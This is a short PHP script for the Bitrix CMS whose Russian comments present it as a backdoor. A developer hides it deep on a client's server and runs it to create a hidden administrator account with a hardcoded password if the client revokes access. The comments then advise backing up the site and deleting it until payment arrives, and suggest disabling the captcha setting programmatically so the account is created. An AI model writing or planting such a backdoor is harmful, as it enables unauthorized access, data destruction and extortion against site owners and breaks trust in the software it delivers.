<?php
/*
Скрипт для создания админской учётной записи
На тот случай, если клиент оказался настолько козлом, что просто изменил доступы к проекту, не известив вас, а все ваши сообщения просто игнорирует, нам поможет простенький скрипт, который создает админскую учетную запись. Его нужно запрятать куда-нибудь поглубже не фтп, и вызвать в случае обмана вас заказчиком. Таким образом мы вернемся доступ к админке. После чего следует сделать резервную копию, сохранить её себе на комп, а сам сайт на хрен снести до получения оплаты :) Уверяю, клиент объявится сам :)
*/
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");
$login = 'superuser'; // Логин
$password = 'aZi-i8vvAvD[fds'; // Пароль. Делайте со спецсимволами, цифрами и символами верхнего и нижнего регистра, а то не создастся
$groups = array(1); // ID админской группы. Скорее всего =1
$email = 'your@email.com'; // Почта. На всякий случай

$user = new CUser;
$arFields = array(
    "EMAIL"             => $email,
    "LOGIN"             => $login,
    "LID"               => "ru",
    "ACTIVE"            => "Y",
    "GROUP_ID"          => $groups,
    "PASSWORD"          => $password,
    "CONFIRM_PASSWORD"  => $password
);
$ID = $user->Add($arFields);
if(intval($ID) > 0) echo 'Админ создан';
else echo $user->LAST_ERROR;
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");

/*
Скрипт ничего, НО если в админке будет стоять "использовать каптча при регистрации", то скрипт не добавит пользователя, поэтому предварительно надо отключить соответствующую опцию главного модуля (программно), используя мелод SetOption()
*/